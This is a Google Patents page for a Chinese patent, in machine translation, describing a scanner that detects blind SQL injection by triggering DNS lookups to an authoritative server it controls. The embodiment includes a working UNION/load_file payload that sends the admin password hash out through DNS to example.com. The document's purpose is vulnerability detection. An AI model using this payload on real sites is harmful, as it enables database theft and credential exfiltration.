CN109347805A - It is a kind of based on DNS without echo SQL injection detection method - Google Patents
It is a kind of based on DNS without echo SQL injection detection method Download PDFInfo
- Publication number
- CN109347805A CN109347805A CN201811096610.0A CN201811096610A CN109347805A CN 109347805 A CN109347805 A CN 109347805A CN 201811096610 A CN201811096610 A CN 201811096610A CN 109347805 A CN109347805 A CN 109347805A
- Authority
- CN
- China
- Prior art keywords
- dns server
- dns
- sql injection
- request
- authoritative
- Prior art date
- Legal status (The legal status is an assumption and is not a legal conclusion. Google has not performed a legal analysis and makes no representation as to the accuracy of the status listed.)
- Granted
Links
Classifications
-
- H—ELECTRICITY
- H04—ELECTRIC COMMUNICATION TECHNIQUE
- H04L—TRANSMISSION OF DIGITAL INFORMATION, e.g. TELEGRAPHIC COMMUNICATION
- H04L63/00—Network architectures or network communication protocols for network security
- H04L63/14—Network architectures or network communication protocols for network security for detecting or protecting against malicious traffic
- H04L63/1433—Vulnerability analysis
-
- H—ELECTRICITY
- H04—ELECTRIC COMMUNICATION TECHNIQUE
- H04L—TRANSMISSION OF DIGITAL INFORMATION, e.g. TELEGRAPHIC COMMUNICATION
- H04L61/00—Network arrangements, protocols or services for addressing or naming
- H04L61/45—Network directories; Name-to-address mapping
- H04L61/4505—Network directories; Name-to-address mapping using standardised directories; using standardised directory access protocols
- H04L61/4511—Network directories; Name-to-address mapping using standardised directories; using standardised directory access protocols using domain name system [DNS]
-
- H—ELECTRICITY
- H04—ELECTRIC COMMUNICATION TECHNIQUE
- H04L—TRANSMISSION OF DIGITAL INFORMATION, e.g. TELEGRAPHIC COMMUNICATION
- H04L67/00—Network arrangements or protocols for supporting network services or applications
- H04L67/01—Protocols
- H04L67/02—Protocols based on web technology, e.g. hypertext transfer protocol [HTTP]
Landscapes
- Engineering & Computer Science (AREA)
- Computer Networks & Wireless Communication (AREA)
- Signal Processing (AREA)
- Computer Security & Cryptography (AREA)
- Computer Hardware Design (AREA)
- Computing Systems (AREA)
- General Engineering & Computer Science (AREA)
- Data Exchanges In Wide-Area Networks (AREA)
Abstract
The present invention relates to a kind of based on DNS without echo SQL injection detection method, SQL injection scanner sends the HTTP request with detection load to targeted website, the DNS request for being directed to Authoritative DNS server is initiated after execution, returning response is to targeted website after Authoritative DNS server parsing, and parsing result is recorded in log, when SQL injection scanner, which initiates parsing record queries to Authoritative DNS server by HTTP request, requests, inquiry log whether there is the testing result of SQL injection loophole according to whether there is solution new record and obtain website.The present invention is detected using the dns resolution of specific coding format record without echo SQL injection, may be implemented quickly and accurately to detect loophole, reduces detection time, is improved scanner detection efficiency, is prevented from failing to report and report by mistake.
Description
Technical field
The present invention relates to prevent unauthorized behavior protection computer, its component, program or data safety device skill
Art field, in particular to it is a kind of to realize that quickly and effectively detection, reduction scanner exist during the SQL injection detection of no echo
Rate of false alarm and rate of failing to report in SQL injection loophole based on DNS without echo SQL injection detection method.
Background technique
SQL is the computer language of a standard, for access with operating database system, SQL statement for fetching and
Data in more new database.SQL can cooperate with database program, be widely used in similar Microsoft
In Access, DB2, Informix, Microsoft SQL Server, Oracle, Sybase and other Database Systems.
However, causing SQL injection loophole generally existing since developer is unreasonable using SQL statement.SQL injection leakage
Hole is the security breaches for betiding the database layer of application program, is to inject SQL among the character string of input to refer in brief
It enables, inspection is ignored in poorly designed program, then the instruction that these injections are entered will be by database server misidentification
It is run to be normal SQL instruction, therefore system is destroyed or invaded.
In the prior art, SQL injection detection is also conventional one of detection mode.According to the type of detection load, SQL note
Enter loophole detection mode include blind note based on boolean, time-based blind note, the SQL injection based on mistake, based on union
The types such as SQL injection, wherein the inspection such as the blind note based on boolean, the SQL injection based on mistake, SQL injection based on union
Survey method is usually used in the detection for having the SQL injection loophole of echo, and time-based blind note is usually used in the SQL injection leakage of no echo
Hole detection.
The detection methods such as the blind note based on boolean, the SQL injection based on mistake, the SQL injection based on union were detecting
Different detection load are sent in journey, generate different http response packets, and page analysis is carried out to these different response bags, is judged whether
There are loopholes;And for the SQL injection loophole of no echo, the request packet of different loads is sent, response bag is the same, according to
Page analysis as a result, SQL loophole is not present, cause SQL loophole to fail to report.
Time-based blind note detection method sends different detection load requests in the detection process, will lead to target network
Delay of standing responds, and time of this delay is determined by the request of detection load, is judged whether according to the different response times
There are SQL loopholes, therefore time-based blind note can be used for the SQL Hole Detection of no echo;But in the actual process, due to
Uncontrollable reason such as network quality, causes HTTP data packet to cause unnecessary time delay in transmission process, causes to make
A large amount of wrong reports are easily generated when detecting the SQL injection loophole without echo with time-based blind note.
Summary of the invention
In order to solve the problems in the existing technology, the present invention provides a kind of the infusing without echo SQL based on DNS of optimization
Enter detection method.
The technical scheme adopted by the invention is that it is a kind of based on DNS without echo SQL injection detection method, the method
The following steps are included:
Step 1:SQL injects scanner and sends the HTTP request with detection load to targeted website;
Step 2: the detection load enters database server by targeted website, detects the detection code quilt in load
Database executes the DNS request concurrently risen for Authoritative DNS server;
Step 3: Authoritative DNS server parses the DNS request and returning response to targeted website, and parsing result is recorded
In log;
Step 4: judging whether SQL injection scanner passes through HTTP request and look into Authoritative DNS server initiation parsing result
Request is ask, if so, carry out in next step, otherwise, return step 1;
Step 5: Authoritative DNS server responds the inquiry request of SQL injection scanner, and inquiry log, parsing is remembered if it exists
Record indicates that there are SQL injection loopholes for website, are otherwise not present SQL injection loophole, returns to SQL injection detection result.
It preferably, include in SQL injection scanner in the step 2, in DNS request for detecting the special of SQL loophole
Character string.
Preferably, in the step 3, Authoritative DNS server parsing for Authoritative DNS server DNS request include with
Lower step:
Step 3.1: the DNS request reaches default DNS server;
Step 3.2: default DNS server can not parse, and the parent dns server initiation for turning to default DNS server is looked into
Ask request;
Step 3.3: parent dns server parses to obtain Authoritative DNS server address according to the DNS request;
Step 3.4: parent dns server returns to authoritative dns server address to default DNS server;
Step 3.5: default DNS server is initiated DNS to Authoritative DNS server with Authoritative DNS server address again and is looked into
Ask request;
Step 3.6: Authoritative DNS server parses the DNS request and returns to correct IP address to defaulting DNS service
Device completes the parsing of DNS request.
The present invention provides a kind of optimizations based on DNS without echo SQL injection detection method, is scanned by SQL injection
Device sends the HTTP request with detection load to targeted website, and the DNS request for being directed to Authoritative DNS server is initiated after execution,
Returning response is to targeted website after Authoritative DNS server parsing, and parsing result is recorded in log, when SQL injection scans
When device initiates parsing record queries request to Authoritative DNS server by HTTP request, inquiry log, according to whether there is parsing
Record, which obtains website, whether there is the testing result of SQL injection loophole.The present invention is recorded using the dns resolution of specific coding format
It detects without echo SQL injection, during the SQL injection detection for solving no echo, blind note based on boolean, based on mistake
SQL injection, the SQL injection detection means bring based on union fail to report problem and time-based blind note detection means is brought
Wrong report problem, may be implemented quickly and accurately to detect loophole, reduce detection time, improve scanner detection efficiency, anti-leak-stopping
Report and wrong report.
Detailed description of the invention
Fig. 1 is flow chart of the invention.
Specific embodiment
The present invention is described in further detail below with reference to embodiment, but protection scope of the present invention is not limited to
This.
The present invention relates to a kind of based on DNS without echo SQL injection detection method, and DNS is a service of internet,
As a distributed data base for mutually mapping domain name and IP address, can make one more easily to access internet, with DNS
Parsing obtains the corresponding conversion of domain name and IP address, is completed by dns server.
There are a SQL to infuse for the targeted website for being parsed and being detected using authoritative DNS with exmaple.com this domain name
For entering loophole, it the described method comprises the following steps.
Step 1:SQL injects scanner and sends the HTTP request with detection load to targeted website.
In the present invention, the embodiment of HTTP request is provided:
Http:// example.com/sqli.php? id=1union select1,2, load_file (CONCAT ('
Dns_sqli_', (SELECT hex (pass) FROM test.test_user WHERE name='admin'LIMIT
1),'.example.com\abc'))。
Step 2: the detection load enters database server by targeted website, detects the detection code quilt in load
Database executes the DNS request concurrently risen for Authoritative DNS server.
It include in SQL injection scanner in the step 2, in DNS request for detecting the special string of SQL loophole.
In the present invention, for Authoritative DNS server DNS request such as: dns_sqli_password.example.com;
Special string such as dns_sqli_password.
Step 3: Authoritative DNS server parses the DNS request and returning response to targeted website, and parsing result is recorded
In log.
In the step 3, Authoritative DNS server parsing for Authoritative DNS server DNS request the following steps are included:
Step 3.1: the DNS request reaches default DNS server;
Step 3.2: default DNS server can not parse, and the parent dns server initiation for turning to default DNS server is looked into
Ask request;
Step 3.3: parent dns server parses to obtain Authoritative DNS server address according to the DNS request;
Step 3.4: parent dns server returns to authoritative dns server address to default DNS server;
Step 3.5: default DNS server is initiated DNS to Authoritative DNS server with Authoritative DNS server address again and is looked into
Ask request;
Step 3.6: Authoritative DNS server parses the DNS request and returns to correct IP address to defaulting DNS service
Device completes the parsing of DNS request.
In the present invention, enabling this DNS request is test.example.com, since parent dns server is not
The resolution server of example.com, therefore test.example.com can not be parsed, but be their ability to parse
Test.example.com is the subdomain of example.com, while parent DNS can parse the authoritative DNS clothes of example.com
Business device address, then parent dns server returns to authoritative dns server address to default DNS server, default DNS server
The DNS query request that test.example.com is carried out to Authoritative DNS server is re-initiated, Authoritative DNS server parses DNS
It requests and returns to the correct IP address of test.example.com to default DNS server.
Step 4: judging whether SQL injection scanner passes through HTTP request and look into Authoritative DNS server initiation parsing result
Request is ask, if so, carry out in next step, otherwise, return step 1;
In the present invention, inquiry request as: inquiry Authoritative DNS server is with the presence or absence of comprising " dns_sqli_ " character string
Request.
Step 5: Authoritative DNS server responds the inquiry request of SQL injection scanner, and inquiry log, parsing is remembered if it exists
Record indicates that there are SQL injection loopholes for website, are otherwise not present SQL injection loophole, returns to SQL injection detection result.
The present invention sends the HTTP request with detection load to targeted website by SQL injection scanner, sends out after execution
The DNS request for Authoritative DNS server is played, returning response, and will parsing knot to targeted website after Authoritative DNS server parsing
Fruit is recorded in log, when SQL injection scanner initiates parsing record queries request to Authoritative DNS server by HTTP request
When, inquiry log whether there is the testing result of SQL injection loophole according to whether there is solution new record and obtain website.The present invention
It is detected using the dns resolution of specific coding format record without echo SQL injection, solves the SQL injection detection mistake of no echo
Cheng Zhong, the blind note based on boolean, the SQL injection based on mistake, the SQL injection detection means bring based on union are failed to report and are asked
Topic and time-based blind note detection means bring report problem by mistake, may be implemented quickly and accurately to detect loophole, reduce detection
Time improves scanner detection efficiency, prevents from failing to report and report by mistake.
Claims (3)
1. it is a kind of based on DNS without echo SQL injection detection method, it is characterised in that: the described method comprises the following steps:
Step 1:SQL injects scanner and sends the HTTP request with detection load to targeted website;
Step 2: the detection load enters database server by targeted website, detects the detection code in load by data
Library executes the DNS request concurrently risen for Authoritative DNS server;
Step 3: Authoritative DNS server parses the DNS request and returning response to targeted website, and parsing result is recorded in day
In will;
Step 4: judging whether SQL injection scanner passes through HTTP request and ask to Authoritative DNS server initiation parsing result inquiry
It asks, if so, carry out in next step, otherwise, return step 1;
Step 5: Authoritative DNS server responds the inquiry request of SQL injection scanner, and inquiry log parses record sheet if it exists
Show that there are SQL injection loopholes for website, SQL injection loophole is otherwise not present, returns to SQL injection detection result.
2. it is according to claim 1 it is a kind of based on DNS without echo SQL injection detection method, it is characterised in that: the step
It include in SQL injection scanner in DNS request for detecting the special string of SQL loophole in rapid 2.
3. it is according to claim 1 it is a kind of based on DNS without echo SQL injection detection method, it is characterised in that: the step
In rapid 3, Authoritative DNS server parsing for Authoritative DNS server DNS request the following steps are included:
Step 3.1: the DNS request reaches default DNS server;
Step 3.2: default DNS server can not parse, and the parent dns server for turning to default DNS server, which initiates inquiry, asks
It asks;
Step 3.3: parent dns server parses to obtain Authoritative DNS server address according to the DNS request;
Step 3.4: parent dns server returns to authoritative dns server address to default DNS server;
Step 3.5: default DNS server, which initiates DNS query to Authoritative DNS server with Authoritative DNS server address again, asks
It asks;
Step 3.6: Authoritative DNS server parses the DNS request and returns to correct IP address to default DNS server, complete
At the parsing of DNS request.
Priority Applications (1)
Application Number | Priority Date | Filing Date | Title |
---|---|---|---|
CN201811096610.0A CN109347805B (en) | 2018-09-19 | 2018-09-19 | DNS-based echoless SQL injection detection method |
Applications Claiming Priority (1)
Application Number | Priority Date | Filing Date | Title |
---|---|---|---|
CN201811096610.0A CN109347805B (en) | 2018-09-19 | 2018-09-19 | DNS-based echoless SQL injection detection method |
Publications (2)
Publication Number | Publication Date |
---|---|
CN109347805A true CN109347805A (en) | 2019-02-15 |
CN109347805B CN109347805B (en) | 2021-06-15 |
Family
ID=65305552
Family Applications (1)
Application Number | Title | Priority Date | Filing Date |
---|---|---|---|
CN201811096610.0A Active CN109347805B (en) | 2018-09-19 | 2018-09-19 | DNS-based echoless SQL injection detection method |
Country Status (1)
Country | Link |
---|---|
CN (1) | CN109347805B (en) |
Cited By (6)
Publication number | Priority date | Publication date | Assignee | Title |
---|---|---|---|---|
CN111597559A (en) * | 2020-05-15 | 2020-08-28 | 北京铭图天成信息技术有限公司 | Method, device, equipment and storage medium for detecting system command injection vulnerability |
CN111600885A (en) * | 2020-05-15 | 2020-08-28 | 北京铭图天成信息技术有限公司 | SQL injection vulnerability detection method and device, equipment and storage medium |
CN111953638A (en) * | 2019-05-17 | 2020-11-17 | 北京京东尚科信息技术有限公司 | Network attack behavior detection method and device and readable storage medium |
CN113987521A (en) * | 2021-12-28 | 2022-01-28 | 北京安华金和科技有限公司 | Scanning processing method and device for database bugs |
CN114143047A (en) * | 2021-11-17 | 2022-03-04 | 湖北天融信网络安全技术有限公司 | Vulnerability detection method and device, terminal equipment, Web server and storage medium |
CN114157452A (en) * | 2021-11-12 | 2022-03-08 | 湖北天融信网络安全技术有限公司 | XXE vulnerability detection method and system based on HTTP connection platform |
Citations (6)
Publication number | Priority date | Publication date | Assignee | Title |
---|---|---|---|---|
US7657540B1 (en) * | 2003-02-04 | 2010-02-02 | Seisint, Inc. | Method and system for linking and delinking data records |
CN102136051A (en) * | 2011-05-06 | 2011-07-27 | 南开大学 | Method for driving web application penetration testing by applying SGM-SQL (sage grant management-structured query language) injection model |
CN105631341A (en) * | 2015-12-18 | 2016-06-01 | 北京奇虎科技有限公司 | Blind test method and device of bug |
CN106612339A (en) * | 2015-10-27 | 2017-05-03 | 中国电信股份有限公司 | Domain name updating method, system and main DNS (Domain Name System) server |
CN106790195A (en) * | 2016-12-30 | 2017-05-31 | 北京神州绿盟信息安全科技股份有限公司 | A kind of SQL injection detection method and device |
CN108509792A (en) * | 2017-02-23 | 2018-09-07 | 腾讯科技(深圳)有限公司 | A kind of injection loophole detection method and device |
-
2018
- 2018-09-19 CN CN201811096610.0A patent/CN109347805B/en active Active
Patent Citations (6)
Publication number | Priority date | Publication date | Assignee | Title |
---|---|---|---|---|
US7657540B1 (en) * | 2003-02-04 | 2010-02-02 | Seisint, Inc. | Method and system for linking and delinking data records |
CN102136051A (en) * | 2011-05-06 | 2011-07-27 | 南开大学 | Method for driving web application penetration testing by applying SGM-SQL (sage grant management-structured query language) injection model |
CN106612339A (en) * | 2015-10-27 | 2017-05-03 | 中国电信股份有限公司 | Domain name updating method, system and main DNS (Domain Name System) server |
CN105631341A (en) * | 2015-12-18 | 2016-06-01 | 北京奇虎科技有限公司 | Blind test method and device of bug |
CN106790195A (en) * | 2016-12-30 | 2017-05-31 | 北京神州绿盟信息安全科技股份有限公司 | A kind of SQL injection detection method and device |
CN108509792A (en) * | 2017-02-23 | 2018-09-07 | 腾讯科技(深圳)有限公司 | A kind of injection loophole detection method and device |
Non-Patent Citations (1)
Title |
---|
AFANT1: "巧用DNSlog实现无回显注入", 《HTTPS://WWW.CNBLOGS.COM/AFANTI/P/8047530.HTML》 * |
Cited By (8)
Publication number | Priority date | Publication date | Assignee | Title |
---|---|---|---|---|
CN111953638A (en) * | 2019-05-17 | 2020-11-17 | 北京京东尚科信息技术有限公司 | Network attack behavior detection method and device and readable storage medium |
CN111953638B (en) * | 2019-05-17 | 2023-06-27 | 北京京东尚科信息技术有限公司 | Network attack behavior detection method and device and readable storage medium |
CN111597559A (en) * | 2020-05-15 | 2020-08-28 | 北京铭图天成信息技术有限公司 | Method, device, equipment and storage medium for detecting system command injection vulnerability |
CN111600885A (en) * | 2020-05-15 | 2020-08-28 | 北京铭图天成信息技术有限公司 | SQL injection vulnerability detection method and device, equipment and storage medium |
CN111597559B (en) * | 2020-05-15 | 2023-10-13 | 北京铭图天成信息技术有限公司 | System command injection vulnerability detection method and device, equipment and storage medium |
CN114157452A (en) * | 2021-11-12 | 2022-03-08 | 湖北天融信网络安全技术有限公司 | XXE vulnerability detection method and system based on HTTP connection platform |
CN114143047A (en) * | 2021-11-17 | 2022-03-04 | 湖北天融信网络安全技术有限公司 | Vulnerability detection method and device, terminal equipment, Web server and storage medium |
CN113987521A (en) * | 2021-12-28 | 2022-01-28 | 北京安华金和科技有限公司 | Scanning processing method and device for database bugs |
Also Published As
Publication number | Publication date |
---|---|
CN109347805B (en) | 2021-06-15 |
Similar Documents
Publication | Publication Date | Title |
---|---|---|
CN109347805A (en) | It is a kind of based on DNS without echo SQL injection detection method | |
CN103744802B (en) | Method and device for identifying SQL injection attacks | |
CN102546576B (en) | A kind of web page horse hanging detects and means of defence, system and respective code extracting method | |
US8949990B1 (en) | Script-based XSS vulnerability detection | |
Jang et al. | Detecting SQL injection attacks using query result size | |
CN108989355B (en) | Vulnerability detection method and device | |
CN103279710B (en) | Method and system for detecting malicious codes of Internet information system | |
US9436730B2 (en) | Methods and systems for validating input data | |
US8528093B1 (en) | Apparatus and method for performing dynamic security testing using static analysis data | |
CN101964025A (en) | XSS (Cross Site Scripting) detection method and device | |
CN102156832B (en) | Security defect detection method for Firefox expansion | |
CN107832622B (en) | Leak detection method, device, computer equipment and storage medium | |
CN105046150A (en) | Method and system for preventing structured query language (SQL) implantation | |
Gupta et al. | XSS‐immune: a Google chrome extension‐based XSS defensive framework for contemporary platforms of web applications | |
CN106713318B (en) | WEB site safety protection method and system | |
CN101895516A (en) | Method and device for positioning cross-site scripting attack source | |
WO2017063274A1 (en) | Method for automatically determining malicious-jumping and malicious-nesting offensive websites | |
CN102970282A (en) | Website security detection system | |
Li et al. | The application of fuzzing in web software security vulnerabilities test | |
CN103001946A (en) | Website security detection method, website security detection equipment and website security detection system | |
CN105404816A (en) | Content-based vulnerability detection method and device | |
CN113961930A (en) | SQL injection vulnerability detection method and device and electronic equipment | |
Choi et al. | HXD: Hybrid XSS detection by using a headless browser | |
CN108282446A (en) | Identify the method and apparatus of scanner | |
Harefa et al. | Sea waf: The prevention of sql injection attacks on web applications |
Legal Events
Date | Code | Title | Description |
---|---|---|---|
PB01 | Publication | ||
PB01 | Publication | ||
SE01 | Entry into force of request for substantive examination | ||
SE01 | Entry into force of request for substantive examination | ||
GR01 | Patent grant | ||
GR01 | Patent grant |